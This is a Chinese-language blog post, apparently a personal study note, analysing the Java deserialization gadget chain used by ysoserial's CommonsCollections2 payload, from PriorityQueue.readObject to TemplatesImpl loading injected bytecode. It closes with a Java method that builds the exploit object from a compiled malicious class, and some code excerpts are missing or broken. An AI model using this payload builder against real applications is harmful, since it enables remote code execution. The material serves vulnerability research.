反序列化漏洞四个重要方法
Java反序列化的过程中可以自动执行序列化类的四个方法,且反序列化的类必须实现了Serializable接口。可以执行的方法包括readObject、readObjectNoData、readResolve,以及实现了Externalizable接口的readExternal方法。
其中readObject、readObjectNoData、readResolve的定义在ObjectStreamClass中有所规定:
要求readObject、readObjectNoData必须为private方法,返回void,readObject入参是ObjectInputStream、readObjectNoData无入参;readResolve是可继承的方法(可被序列化类调用即可,不能调用父类的private方法),无入参,返回Object;readExternal在Externalizable接口中有所定义,要和该定义对应:
这四个方法中除了readObjectNoData都可以直接通过反序列化该类调用,readObjectNoData方法需要找到它的某个子类,在另一个环境中把子类中对它的继承去掉,然后在原环境中反序列化这个子类,才可以调用这个方法。比如如下的HelloImpl类存在readObjectNoData方法:
然后找到它的一个子类serialTest:
去掉继承关系重新编译并序列化serialTest,生成序列化文件test.ser:
然后恢复HelloImpl的继承关系(如果刚才重新编译是在另一个环境中则可以直接在原环境中进行下一步操作),反序列化test.ser文件,就会执行HelloImpl的readObjectNoData:
readObjectNoData原本的作用是当某个序列化的类在反序列化时已经有了不同的版本(继承了不同的父类)时,可以利用父类的该函数对父类属性值进行对应的反序列化。
CommonsCollections2反序列化漏洞点
Ysoserial中Payload CommonsCollections2反序列化漏洞点是commons-collections4-4.0版本包中的InvokerTransformer类(org.apache.commons.collections4.functors.InvokerTransformer)的transform方法,并且在TransformingComparator(org.apache.commons.collections4.comparators.TransformingComparator)的compare方法中有所调用,该compare方法是java.util.Comparator的compare方法的实现方法。Comparator接口的compare方法在PriorityQueue插入元素时会自动调用,对元素进行比较并排序。而PriorityQueue中就实现了反序列化中可以自动调用的方法readObject:
readObject中的heapify函数就会对元素进行排序,调用到comparator的compare方法:
而comparator是在PriorityQueue的属性值中反序列化出来的,把PriorityQueue的comparator设置为漏洞类TransformingComparator即可触发漏洞。
那么InvokerTransformer(org.apache.commons.collections4.functors.InvokerTransformer)中transform方法的漏洞是什么?
首先Compare方法调用了transformer的transform方法:
其入参是PriorityQueue中的某个反序列化出来的对象,在InvokerTransformer类中的transform方法中允许调用反序列化出来的对象的任意指定public方法:
因此这样就把可以执行的方法范围扩大到了任意可反序列化的对象public方法(实现了Serializable接口的任意类的方法)
用到的Gadget
虽然可以执行任意可反序列化对象的方法,但是仍然不能执行任意代码,因此需要再找到一个反序列化类可以实现代码可执行范围的再扩大化。CommonsCollections2用到的Gadget是com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl类,此类就可以帮助我们实现任意代码执行。
TemplatesImpl类首先是一个可以反序列化的类:
然后在其defineTransletClasses方法中可以以自己的属性值_bytecodes作为class的字节码并加载,把新的类存入_class属性中:
但是在这里要注意新加载类的父类必须是ABSTRACT_TRANSLET(com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet),否则会走到else分支报错。然后在getTransletInstance方法中就会调用新加载类的newInstance方法对其进行实例化
在public方法newTransformer中调用了getTransletInstance方法:
因此这样就形成了整个调用链:
PriorityQueue.readObject
PriorityQueue.heapify
PriorityQueue.siftDown
PriorityQueue.siftDownUsingComparator
TransformingComparator.compare
InvokerTransformer.transform
TemplatesImpl.newTransformer
TemplatesImpl.getTransletInstance
EvilClass.newInstance
Ysoserial使用了javassist组件自动生成恶意类的bytecode,这里我们也可以自己写一个类编译成class文件,再读取这个class文件作为bytecode:
恶意类MyEvilClass:
重写的CommonsCollections2的getObject方法:
public Queue
getObject(final String command) throws Exception{
//Object templates =Gadgets.createTemplatesImpl(command);
// mock method name untilarmed
final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
// create queue with numbers and basic comparator
final PriorityQueue
// stub data for replacement later
queue.add(1);
queue.add(1);
byte[] evilClassByte = new byte[10240];
File f = new File("path/MyEvilClass.class");
ByteArrayOutputStream bos = new ByteArrayOutputStream((int)f.length());
BufferedInputStream in = null;
try {
in = new BufferedInputStream(new FileInputStream(f));
int buf_size = 1024;
byte[] buffer = new byte[buf_size];
int len = 0;
while(-1 != (len = in.read(buffer, 0, buf_size))) {
bos.write(buffer, 0,len);
}
evilClassByte =bos.toByteArray();
}
catch (Exceptione) {
e.printStackTrace();
}
Object templates = new TemplatesImpl();
Reflections.setFieldValue(templates, "_bytecodes", new byte[][]{
evilClassByte
});
// required to make TemplatesImpl happy
Reflections.setFieldValue(templates,"_name", "Pwnr");
// switch method called by comparator
Reflections.setFieldValue(transformer,"iMethodName", "newTransformer");
// switch contents of queue
final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue,"queue");
queueArray[0]= templates;
queueArray[1]= 1;
return queue;
}
最后对生成对象的字节码进行反序列化即可:
(网上针对CommonsCollections2反序列化漏洞的分析文章有很多,在此仅做个人研究记录,如果对您有了帮助,可以点个喜欢,谢谢^_^)